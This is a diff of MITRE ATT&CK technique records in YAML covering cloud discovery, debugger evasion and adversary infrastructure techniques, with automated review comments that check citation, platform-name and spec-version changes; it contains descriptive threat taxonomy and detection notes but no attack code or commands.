- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
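Review bot: The prose in the changed description line now says "Microsoft Graph API", but the citation that follows is still `(Citation: Azure AD Graph API)`, and the reference entry it resolves to is not part of this diff. That is presumably verbatim from upstream, but check that an `external_references` entry with `source_name: Azure AD Graph API` still exists on this object (the later hunk at @@ -51168 only touches the tail of that list), otherwise the citation dangles after the rename.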
@@ -51120,10 +51807,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51132,15 +51821,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
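Review bot: `Azure AD`, `Office 365` and `Google Workspace` are dropped from T1526's platform list in favour of `Office Suite` and `Identity Provider` (T1538 gets the same treatment below, and the tail of the first hunk shows the same new names). Anything in this repository that keys on the old platform strings, in particular per-platform index generation, needs to map the new names or these techniques silently disappear from those views. The added `Logon Session: Logon Session Creation` data source together with the 1.3 to 1.4 version bump is consistent with an upstream content change rather than a generator artifact.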
@@ -51168,9 +51858,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -51245,7 +51932,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -51317,7 +52003,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -51366,12 +52051,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51392,12 +52076,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51422,7 +52105,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -51477,7 +52159,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -51497,7 +52179,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -51600,13 +52281,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51617,7 +52297,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51688,29 +52368,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -51734,15 +52413,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
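Review bot: The new `GWS Apps Script Abuse 2021` URL ends in `#google_vignette`, which is the fragment Google's interstitial ad unit appends to the page address when it fires, not part of the article's canonical URL. If this is copied verbatim from the upstream reference it is harmless (fragments are never sent to the server), but it is worth normalising or reporting upstream so it does not propagate. The `source_name` does match the `(Citation: GWS Apps Script Abuse 2021)` added to the description in the previous hunk, and the 2.1.0 to 3.2.0 spec version bump below it is in line with the other objects.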
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51774,17 +52456,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51837,11 +52518,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51877,7 +52557,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -51926,43 +52606,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -51975,18 +52624,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
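Review bot: Nothing is lost across the split of T1588.004 into the removal hunk above and this re-addition, but it needs checking by hand because the two halves are far apart: all five `external_references` (mitre-attack, DiginotarCompromise, Let's Encrypt FAQ, Splunk Kovar Certificates 2017, Recorded Future Beacon Certificates) reappear, with the Recorded Future URL changed from `/cobalt-strike-servers/` to `/research/cobalt-strike-servers` and its retrieval date moved to September 16, 2024; `id`, `type`, `created`, `created_by_ref`, `x_mitre_platforms` and `x_mitre_domains` all come back, and the genuinely new content is `revoked: false`, `x_mitre_deprecated: false` and the 2.1.0 to 3.2.0 spec version bump. `x_mitre_version` stays at 1.2 even though `modified` advances to 2024-09-16, which is consistent with a citation-only update upstream.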
@@ -52008,7 +52688,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52024,8 +52704,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
@@ -52047,7 +52725,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52067,8 +52745,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -52107,7 +52783,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52128,8 +52804,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -52159,7 +52833,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -52196,8 +52870,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -52219,7 +52891,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52241,8 +52913,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -52279,7 +52949,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -52301,8 +52971,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -52364,7 +53032,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52386,7 +53053,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52404,8 +53071,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52440,7 +53105,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52459,33 +53124,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
